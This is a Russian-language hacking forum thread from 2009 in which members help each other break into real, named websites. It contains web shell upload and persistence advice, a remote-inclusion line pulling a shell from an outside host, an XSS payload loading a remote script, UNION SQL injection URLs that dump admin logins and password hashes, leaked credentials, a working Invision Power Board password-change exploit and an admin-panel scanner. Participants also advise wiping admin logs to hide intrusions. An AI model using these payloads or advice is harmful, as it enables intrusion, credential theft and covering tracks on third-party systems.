require_once("config.php");
require_once("security_mod.php");
if(empty($_POST['name'])) exit("Не указано имя нового пользователя");
if(empty($_POST['pass'])) exit("Не указан пароль пользователя");
if($_POST['pass'] != $_POST['pass_again']) exit("Пароли не равны");
if (!get_magic_quotes_gpc())
{
$_POST['name'] = mysql_escape_string($_POST['name']);
$_POST['pass'] = mysql_escape_string($_POST['pass']);
}
$_POST['name'] = str_replace("'","`",$_POST['name']);
$_POST['pass'] = str_replace("'","`",$_POST['pass']);
$query = "INSERT INTO userlist VALUES (NULL,'$_POST[name]','".md5($_POST['pass'])."')";
if(mysql_query($query))
{
echo "Новый пользователь создан";
echo "<HTML><HEAD>
<META HTTP-EQUIV='Refresh' CONTENT='0; URL=index.php'>
</HEAD></HTML>";
}
else
{
exit("Ошибка при добавлении нового пользователя");
}
?>
а .htaccess выглядит так:
Options -Indexes
AuthName "Restricted area"
AuthType Basic
AuthUserFile /home/www/abc/.htpasswd
Require valid-user
help , кто нибуть знает что такое "Turck MMCache" ?
https://www.kyivstar.net/admin/php-mmcache/
Гугл знает
http://turck-mmcache.sourceforge.net/index_old.html
-m0rgan-
02.04.2009, 19:44
Turck MMCache это что то типа мода для php.
Используется для повышения функционала.
Turck MMCache является свободным PHP ускорителем, оптимизатором, кодировщик и динамическим содержимым кэш-памяти.
Он повышает эффективность PHP скриптов, кэширование их в общем состояни, так что накладные расходы в сборе почти полностью ликвидированы. Он также использует некоторые оптимизации для ускорения исполнения PHP скриптов. Он, как правило, снижает нагрузку сервер и увеличивает скорость работы PHP кода от 1 до 10 раз.
Кстати... Тут парень спрашивал про сайт =)
Вот нарыл на нем:
_http://www.rikor-electronics.ru/rekl/
_http://rikor-electronics.ru/docs_files/
-m0rgan-
02.04.2009, 20:38
=)
ну там скуль...не удивительно)
Но ему бд нужна...
navigat0r
02.04.2009, 20:48
помогите пож-та разобраться в синтаксе, очень нужно это сделать побыстрее, а то злой админ придёт)
Вот такое выдает при попытке почистить логи админа в бд MySQL 5.0.67 (proto v.10)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '* FROM `ibf_admin_login_logs` WHERE `admin_id` = '1298' AND `admin_ip_address` =' at line 1
mailbrush
02.04.2009, 20:52
У тебя косяк возле звездочки... Весь запрос кинь
BlackSun
02.04.2009, 20:57
Полагаю у него DELETE * FROM ... звездочку убери и все нормально будет.
=)
ну там скуль...не удивительно)
Но ему бд нужна...
1) Перебрал таблы, таблы с пассами не нашел =(
2) Админку не нашел
Т.ч....
запрос на удаление идет так:
delete from `table_name` where [блок условий]
залей шелл от маднета и подключись к бд, а там можно и не знать синтаксис так как в граф. интерфейсе есть все...удаляй по одной а можно и целиком все записи логов
navigat0r
02.04.2009, 21:02
DELETE * FROM `ibf_admin_login_logs` WHERE `admin_id` = '1298' AND `admin_ip_address` = '89.188.114.74' AND `admin_username` = 'Allen' AND `admin_time` = '1238622043' AND `admin_success` = '1' AND `admin_post_details` = 'a:2:{s:3:\ LIMIT 1;
navigat0r
02.04.2009, 21:03
если убрать * то получается следующее:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a:2:{s:3:\ LIMIT 1' at line 1
navigat0r
02.04.2009, 21:07
а шелл вот какой Locus7
2 navigat0r C99
http://madnet.name/files/1/10.html
navigat0r
02.04.2009, 21:29
2 navigat0r C99
http://madnet.name/files/1/10.html
ща попробую
navigat0r
02.04.2009, 21:43
шелл от madneta не помогает, он всё выполняет без ошибок, но лог так и остался.Может недостаточно прав??Я получил рута, создал нового user с привелегиями рута(как вооще его содать). Как теперь запустить шелл от user? Такое возможно?
-m0rgan-
02.04.2009, 21:49
Попробуй подключится к БД с учёки рута...
navigat0r
02.04.2009, 22:02
Попробуй подключится к БД с учёки рута...
как это сделать?? Использую putty ssh client.
navigat0r
02.04.2009, 22:41
Попробуй подключится к БД с учёки рута...
как это сделать?? Использую putty ssh client в виде интерактивного шелла.
как это сделать?? Использую putty ssh client в виде интерактивного шелла.
Подключись через с99
navigat0r
03.04.2009, 00:42
Подключись через с99
собственно в этом то и проблема.Шелл с99 запускается из под www(user) который не обладает привилегиями рута.Как мне запустить с99 из под моего созданного пользователя??
собственно в этом то и проблема.Шелл с99 запускается из под www(user) который не обладает привилегиями рута.Как мне запустить с99 из под моего созданного пользователя??
Подключись к БД от кого хочешь...
navigat0r
03.04.2009, 01:16
Подключись к БД от кого хочешь...
как это от кого хочешь??!Ведь у бд есть только один user и passwd, они в конфиге в корне форума прописываются.Или я чего то не понимаю?
как это от кого хочешь??!Ведь у бд есть только один user и passwd, они в конфиге в корне форума прописываются.Или я чего то не понимаю?
не понимаешь... К БД доступ может иметь N-ое кол-во акков) Если есть доступ к PHPMyAdmin, то через нее посмотри... Получить доступ к ней можно из данных таблицы mysql.user (не всегда ;) )
navigat0r
03.04.2009, 05:05
не понимаешь... К БД доступ может иметь N-ое кол-во акков) Если есть доступ к PHPMyAdmin, то через нее посмотри... Получить доступ к ней можно из данных таблицы mysql.user (не всегда ;) )
как попасть в PHPMyAdmin? через админку??Или через шелл?Или ещё как нить?
-m0rgan-
03.04.2009, 07:45
Пхпмайадмин чаще всего установлен на хостинге, где хоститсо сайт...
Ураааааааа, я проник к нему и загрузил шелл, только файл шелла с расширение .php
Как его текстового запускать?
А можно при помощи шелла добавить нового пользователя в бд?
Как вот лучше закрепиться на его акаунте?
в смысле как запускать? обратися по адресу де ты его загрузил и усе!
Ураааааааа, я проник к нему и загрузил шелл, только файл шелла с расширение .php
Как его текстового запускать?
Создаёшь файл '.htaccess'
внутри него:
<Files "text.txt">
AddType application/x-httpd-php .txt
</Files>
далее грузишь шелл с именем text.txt
А можно при помощи шелла добавить нового пользователя в бд?
Ищи в шеле конфиги к базе данных внутри скриптов (логин;пароль;имя_базы) .. коннекться и создавай что за хочешь..
Как вот лучше закрепиться на его акаунте?
Редактируй скрипты.. вставляй в них инклуды .. eval-ы passthru , system .. etc
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
ищи какие нить конфиги и тд! Здесь мож глянуть шо читать http://forum.antichat.ru/thread49775.html
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
1) Можешь найти ошибку и там будет путь: /home/host/site.ru/www/func/inc.php т.е. ты берешь путь home/host/site.ru/www/index.php и пробуешь прочитать файл. Если получится, то есть шанс найти конфиги коннекта к БД и подключиться!
2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php ;)
Даа еслиб я знал как написать уязвимый код , я не программер(((
Может подскажите как сделать sql запрос для добавления нового пользователя в базу?
или как скрипт уязвимый подписать?
или литературку ?
-m0rgan-
03.04.2009, 15:58
Добавить юзера в БД:
mysql --user=root mysql
INSERT INTO user VALUES('localhost','monty',PASSWORD('some_pass'),
'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y ','Y');
mysql> INSERT INTO user VALUES('%','monty',PASSWORD('some_pass'),
'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y ','Y');
Подробнее здесь: http://www.phpclub.ru/mysql/doc/adding-users.html
2) Попробуй так: page.php?filename=http://shell.ru/shell.txt? - Почему .txt? Потому что веб сервер его интерпритирует как .php ;)
удаленно подключить шелл вроде не выйдет потому что в инклуде у них сначала идет определенный путь а потом уже подставляется параметр
include(<путь>/<парам>_blabla.php)
-m0rgan-
03.04.2009, 19:48
у меня такой вопрос,
что полезного можно запустить или прочитать с помощью php-инклуда кроме /etc/passwd ?
есть /etc/shadow но прав на чтение нету
Можно прочитать конфиг коннекта к бд (если она имеется). После чего залогинится с ними для администрирования БД.
Ещё можно попытаться заинклудить шелл - например из картинки(если есть возможность залить) или из логов апача...
-m0rgan-
03.04.2009, 21:12
S00pY, можно, но если есть права и полный путь, то лучше воспользоватся функцией into outfile.
Можно прочитать конфиг коннекта к бд (если она имеется). После чего залогинится с ними для администрирования БД.
нашел my.cnf
там указан путь к mysqld.log
когда попытался его прочитать получил permission denied
то же самое и с сpanel.config
там указаны пути к .log файлам но прочесть ни один не смог из-за отсутствия прав
Jokester
03.04.2009, 22:30
лучше воспользоватся функцией into_outfile().
Нет такой функции :)
FarIZ
http://forum.antichat.ru/thread23501.html
https://forum.antichat.ru/thread22832.html
http://forum.antichat.ru/showthread.php?t=23394
-m0rgan-
03.04.2009, 22:35
Нет такой функции :)
Спасибо, поправил)
-m0rgan-
03.04.2009, 22:41
нашел my.cnf
там указан путь к mysqld.log
когда попытался его прочитать получил permission denied
то же самое и с сpanel.config
там указаны пути к .log файлам но прочесть ни один не смог из-за отсутствия прав
Я говорил об php конфиге.
Он можен находится не как отдельный файл, а быть вписаным скажем в index.php и т.д.
Для того что бы заюзать удаленый инклуд, необходимо указывать только на шелл в расширении .txt?
И второй вопрос:
Есть пасивная xss. Куки приходят. После подмены меня просто выкидует из аккаунта.
Бывает такое что просто надо не все поля заменять? Или тут ничего не сделаешь?
DrAssault
04.04.2009, 09:56
Для того что бы заюзать удаленый инклуд, необходимо указывать только на шелл в расширении .txt?
Зависит от конкретной ситуации! Однозначно не скажешь...
mailbrush
04.04.2009, 10:24
Для того что бы заюзать удаленый инклуд, необходимо указывать только на шелл в расширении .txt?Нет, ссылку указывают тхт, чтобы кто-то не открыл сам шелл. DrAssault тоже прав...
Есть пасивная xss. Куки приходят. После подмены меня просто выкидует из аккаунта.
Бывает такое что просто надо не все поля заменять? Или тут ничего не сделаешь?Если идёт привязка по ипу - ничего не сделаешь.
Iceangel_
04.04.2009, 10:32
Нет, ссылку указывают тхт, чтобы кто-то не открыл сам шелл. DrAssault тоже прав...
)))
инклудят в большинстве случаев именно тхт(можно инклудить хоть мп3), потому что файл с расширением php интерпретируется на удаленном сервере(в большинстве случаев, если не стоит php_flag engine off), а не потому что "кто-то" может открыть шелл.
DrAssault
04.04.2009, 10:42
Если идёт привязка по ипу - ничего не сделаешь.
Так же не стоит забывать что куки временные файлы, возможно что срок действия куков вышел... Какого сервиса куки то?
ЗЫ Iceangel_ прав...
Я говорил об php конфиге.
Он можен находится не как отдельный файл, а быть вписаным скажем в index.php и т.д.
а, сорри.
когда подключаю индекс то он выполняется т.е. вижу готовую страницу а содержимое index.php прочитать опять же не могу
Сергей Анатольевич
04.04.2009, 18:42
На IPB 2.1.7 есть еще рабочие уязвимости ? Я имею ввиду паблик. Спасибо
-m0rgan-
04.04.2009, 18:45
Есть
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
__________________________________________________ _________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability was already found before, but there was no available
public "figting" exploit for it. This POC consists of several parts - active xss generator,
JS-file, which will be caused at visiting page with xss, log viewer and special component,
which will take necessary data from MySQL forum's tables in case if intercepted session
belonged to the person with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for
future injetion on the forum board. As the reference it is necessary to specify the full way
up to ya.js file (in which you have already preliminary corrected way on your own). Most likely
it is necessary only to press the button.
http://www.ya.ru/ onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =.gif
The injection can be executed only when there is available session of the user with access
in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval"
function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
www.underwater.itdefence.ru/isniff.rar
www.milw0rm.com/sploits/2008-isniff.rar
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-05]
<?php
/*
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
// An existing user's login name
$name = "admin";
// The new password(3-32 characters)
$pass = "1234";
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
# milw0rm.com [2006-11-01]
А если ты на щёт патченых форумов - то врятли!
http://www.la2onix.ru/?act=news&page='
Тут не похек?
-m0rgan-
04.04.2009, 19:05
Точно не скажу, ибо после второго запроса мой ip заблочили =///
Но вроде как нет...
http://www.la2onix.ru/?act=news&page=
Здесь раскрытие путей...
Здесь раскрытие путей...
так это ясно что раскрытие путей (не слепой)
возможна скуль? я вот что спрашиваю!
DrAssault
04.04.2009, 19:08
http://www.la2onix.ru/?act=news&page='
Тут не похек?
Да все там норм, обыкновенная защита от ботов, тип поля как видно текстовый, максимум моно пути извлечь: /home/la2onix8/public_html/kernel/components/antiddos/anti_ddos.php
От ддоса защищаются собаки))) О скуль инъекции речи нет...
mailbrush
04.04.2009, 19:13
Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
DrAssault
04.04.2009, 19:18
Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
Воу воу попредержите коней, на тип поля внимание обрати!!! Не вывелось бы...
Здрасте
На сайте достал логин и пароль админа.Но не могу найти как зайти под админам . глянте пожалуиста
so-znanie.com
Login: Admin
pw: soznanie
mailbrush
04.04.2009, 19:39
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users++limit+1,1
брути!
кароче нашел уязвимосьть на сайте такого содержания
Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails.
ссылка примерно такая: index.php?url=199000&ref=1
Как её использовать ?
DrAssault
04.04.2009, 19:44
кароче нашел уязвимосьть на сайте такого содержания
Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails.
ссылка примерно такая: index.php?url=199000&ref=1
Как её использовать ?
Ну и в чем трабла то?
в этом вроде должно что то быть .. я незнаю , поэтому и спрашиваю
DrAssault
04.04.2009, 19:54
в этом вроде должно что то быть .. я незнаю , поэтому и спрашиваю
Дай полностью параметр подумаем...
Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос .
ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_ password+)+from+phpbb_users+LIMIT+1,1+--
Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос .
ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_ password+)+from+phpbb_users+LIMIT+1,1+--
это MD5(phpBB3)
я вот вроде нашел где php.ini
но когда его инклудом подключить хочу то получаю это
Parse error: syntax error, unexpected ',' in /usr/local/lib/php.ini on line 70
не подскажете с чем связано ?
2 z00MAN
это чем то можно раскодировать ?
2 z00MAN
это чем то можно редактировать ?
http://www.insidepro.com/rus/passwordspro.shtml
-m0rgan-
04.04.2009, 20:49
я вот вроде нашел где php.ini
но когда его инклудом подключить хочу то получаю это
Parse error: syntax error, unexpected ',' in /usr/local/lib/php.ini on line 70
не подскажете с чем связано ?
Лишняя запятая.
-m0rgan-
04.04.2009, 20:57
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users++limit+1,1
брути!
Челу вроде как сайт нужен, а не форум... :rolleyes:
http://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a,id,login,passwor d)+from+admins--+
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
1:admin:soznanie
Так что правильный у него пасс...
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
1:admin:soznanie
Если честно , я спрашивал как заити под админам
-m0rgan-
04.04.2009, 21:17
Мне кажется что админка там заныкана и находится по адресу типа /admin/blablabla.php и на папку /admin/ стоит запрет чтения...
Воспользуйся брутером местоположения админки.
laedafess
04.04.2009, 21:20
error_log - 403 Forbidden
robots.txt - 200 OK
test.htm - 200 OK
test.php - 200 OK
db/ - 200 OK
stats/ - 200 OK
config.php - 200 OK
ini/ - 200 OK
cpanel/ - 200 OK
~root/ - 403 Forbidden
cgi-bin/ - 403 Forbidden
img/ - 200 OK
images/ - 200 OK
forum/ - 200 OK
article/ - 200 OK
articles/ - 200 OK
cgi-sys/ - 403 Forbidden
css/ - 200 OK
gallery/ - 200 OK
js/ - 200 OK
чето хз где там админка, цпанель с sql на сайте никак не связана, а больше ниче не нашел...
Так что брутьте пхпбб хэш и лейте шелл:)
2 -m0rgan-
спасибо . А что за брут по админке ?
-m0rgan-
04.04.2009, 21:24
2 -m0rgan-
спасибо . А что за брут по админке ?
#/usr/bin/python
import sys, os, time, httplib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) != 2:
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Help: admin-find.py -h |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-----------------------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Usage: admin-find.py www.site.com |"
print "| Example: admin-find.py site.com |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1].replace("http://","").rsplit("/",1)[0]
site = site.lower()
admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php']
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "[+] Target:",site
print "[+] Checking paths..."
print
try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass
Лишняя запятая.
ошибка в самом php.ini чтоли ?
-m0rgan-
04.04.2009, 22:02
Эм...а куда ты его подключаешь?
дай код!
в принципе я делаю только вот такой запрос
http://www.sitename.com/scriptname.php?param=../../../../../../../../../../../usr/local/lib/php.ini%00
DimOnOID
04.04.2009, 22:42
2 -m0rgan-
спасибо . А что за брут по админке ?
http://so-znanie.com/backend/main.php
забыл каким образом можно выводит все содержание папки , а не пользуясь LIMIT 1,1 .....
-m0rgan-
04.04.2009, 22:51
2 Saiga
Можно воспользуватся функцией group_concat()
http://www.so-znanie.com/index.php?id=-8+union+all+select+1,2,group_concat(concat_ws(0x3a 3a,username,user_password))+from+phpbb_users--
Anonymous::,admin::$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21,AdsBot [Google]::,Alexa [Bot]::,Alta Vista [Bot]::,Ask Jeeves [Bot]::,Baidu [Spider]::,Exabot [Bot]::,FAST Enterprise [Crawler]::,FAST WebCrawler [Crawler]::,Francis [Bot]::,Gigabot [Bot]::,Google Adsense [Bot]::,Google Desktop::,Google Feedfetcher::,Google [Bot]::,Heise IT-Markt [Crawler]::,Heritrix [Crawler]::,IBM Research [Bot]::,ICCrawler - ICjobs::,ichiro [Crawler]::,Majestic-12 [Bot]::,Metager [Bot]::,MSN NewsBlogs::,MSN [Bot]::,MSNbot Media::,NG-Search [Bot]::,Nutch [Bot]::,Nutch/CVS [Bot]::,OmniExplorer [Bot]::,Online link [Validator]::,psbot [Picsearch]::,Seekport [Bot]::,Sensis [Crawler]::,SEO Crawler::,Seoma [Crawler]::,SEOSearch [Crawler]::,Snappy [Bot]::,Steeler [Crawler]::,Synoo [Bot]::,Telekom [Bot]::,TurnitinBot [Bot]::,Voyager [Bot]::,W3 [Sitesearch]::,W3C [Linkcheck]::,W3C [Validator]::,WiseNut [Bot]::,YaCy [Bot]::,Yahoo MMCrawler [Bot]::,Yahoo Slurp [Bot]::,Yahoo [Bot]::,YahooSeeker [Bot]::,Виталий::$H$9hSsjxJ2UF5iUD8kzntbWpyPoXfE
Там ботов больше чем людей =))
group_concat() всех не выведеш
Jokester
04.04.2009, 23:43
Дорогие отвечающие на вопросы!!!
Я уже несколько раз говорил, что если уж вы отвечаете на вопросы не надо писать ОХИНЕЮ и разводить флуд и оффтоп на 15 страниц.
Человек искал админку ат сайта, имея пасс от него. Вот пост НОРМАЛЬНОГО ответа по теме:
http://so-znanie.com/backend/main.php
ВСЁ !!!!
Нахрена ему говорить, что пароль не правильный, когда админка даже не найдена? Нахрена ему ваша скуль? У него есть аккаунт, может он его и достал через скуль, он НЕ ПРОСИЛ искать баги, он просил админку. Нахрена ему форум, нахрена ему расшифровывать хеши от него?
И весь этот ОФФТОП на несколько страниц, а результата нет и не предвидится.
И так по каждому вопросу. На будующее, такую бессмысленную активность буду расценивать как флуд и набивание постов и реагировать на неё согласно правилам форума.
Сюда-же попадает ОХИНЕЯ, которую некоторые несут с завидной регулярностью.
Если вы не уверены в ответе, отвечать НЕ НУЖНО.
Если человек просит подсказать есть ли скуль, НЕ НАДО писать, что там расскрытие пути, сдесь нет слепых юзеров. Не надо сюда копипастить милворм, в лучшем случае ссылку на сплоит. Не надо показавать свою некомпетентность, я вам со всей ответственностью могу заявить, что такого рода активность не пойдёт вам в зачёт, она напротив только показывает отсутствие знаний.
Надеюсь , что все меня поняли правильно, утопить топик во флуде я не дам, весь оффтоп буду жестко пресекать
Спасибо за внимание
челы резко встал вопрос залития шелла в dle
1. изменил тип файлов, залил через новость.. но я незнаю названия файла..
2. через шаблон пхп не исполняется..
подскажи еще способы.. очень прошу - нужно!
народ, помогите.
есть сайт www.sait.ru
скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n
генерация страницы просиходит примерно следующим образом
$path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm';
///
$x = fopen($path, 'w');
///
require($path);
если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title
выведет ее.
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00
но никак не укладываюсь в 8 символов.
заранее спасибо
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти??
никак.
joks, у тебя ведь 2 параметра? если так, то
пусть p = http:/
n = abc.ru/a
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
